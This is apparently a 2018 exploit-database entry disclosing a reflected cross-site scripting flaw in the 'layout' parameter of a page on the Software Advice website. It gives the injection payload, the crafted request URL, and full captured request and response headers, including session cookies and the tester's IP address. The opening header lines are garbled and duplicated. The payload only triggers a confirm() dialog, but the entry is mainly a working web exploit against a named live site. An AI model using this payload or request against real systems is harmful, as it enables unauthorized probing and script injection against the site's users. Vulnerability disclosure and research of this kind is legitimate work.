# Exploit Title: [ Reflected XSS at Software Advice ]

# Date: [27.05.2018]

# Exploit Author: [Ismail Tasdelen]

# Vendor Homepage: [https: # Exploit Title: [ Reflected XSS at Software Advice ]

# Date: [27.05.2018]

# Exploit Author: [Ismail Tasdelen]

# Vendor Homepage: [https://www.softwareadvice.com/]

# Software Link: [ Software Advice Website ]

# Version: 1.0

# Tested on: Kali Linux

# Reflected XSS Payload : '-confirm`Ismail Tasdelen`-'

# HTTP REQUEST HEADER :

Request URL: https://www.softwareadvice.com/hr/workable-profile/?layout=%27-confirm`Ismail%20Tasdelen`-%27
Request Method: GET
Status Code: 200
Remote Address: 23.221.165.35:443
Referrer Policy: no-referrer-when-downgrade
:authority: www.softwareadvice.com
:method: GET
:path: /hr/workable-profile/?layout=%27-confirm`Ismail%20Tasdelen`-%27
:scheme: https
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
accept-encoding: gzip, deflate, br
accept-language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
cache-control: max-age=0
cookie: PHPSESSID=84ghfoei5qehtisf94lk187es6; optimizelyEndUserId=oeu1527439807853r0.3055516258919597; _ga=GA1.2.53898763.1527439811; _gid=GA1.2.242573448.1527439811; hasSeenCookiesConsent=1; __utma=24246072.53898763.1527439811.1527439812.1527439812.1; __utmc=24246072; __utmz=24246072.1527439812.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IR_gbd=softwareadvice.com; IR_PI=1527439811848.llloh2aehwq; lc_sso7520261=1527439812306; _gu=fc0f39ef-3375-48f4-8a23-f2bc31885a3a; __lc.visitor_id.7520261=S1527439814.38416b2f19; _gs=2.s(src=https://www.softwareadvice.com/hr/workable-profile/?layout=%27-confirm`Ismail%20Tasdelen`-%27)c[Desktop,Chrome,25:347:7992:,Windows,212.253.204.84]; __utmb=24246072.8.10.1527439812; _uetsid=_uetabcf556c; IR_8018=1527440320552%7C0%7C1527439811848; _gw=2.u[~0,~0,~0,~0,~0]v[~f5n0a,~8,~0]a()
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36

# HTTP RESPONSE HEADER :

accept-ranges: bytes
browser-cache: none
cache-control: max-age=0, no-cache, no-store
cache-type: default
content-encoding: gzip
content-length: 38319
content-type: text/html; charset=UTF-8
date: Sun, 27 May 2018 17:00:18 GMT
expires: Sun, 27 May 2018 17:00:18 GMT
front-end-https: on
hosted: web24
p3p: CP="CAO PSA OUR"
pragma: no-cache
server: nginx
status: 200
strict-transport-security: max-age=31536000
vary: Accept-Encoding
x-varnish: 10849666
x-varnish-cache: pass
x-varnish-ttl: 0

# Query String Parametres :

layout: '-confirm`Ismail Tasdelen`-'

# You want to follow my activity ?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln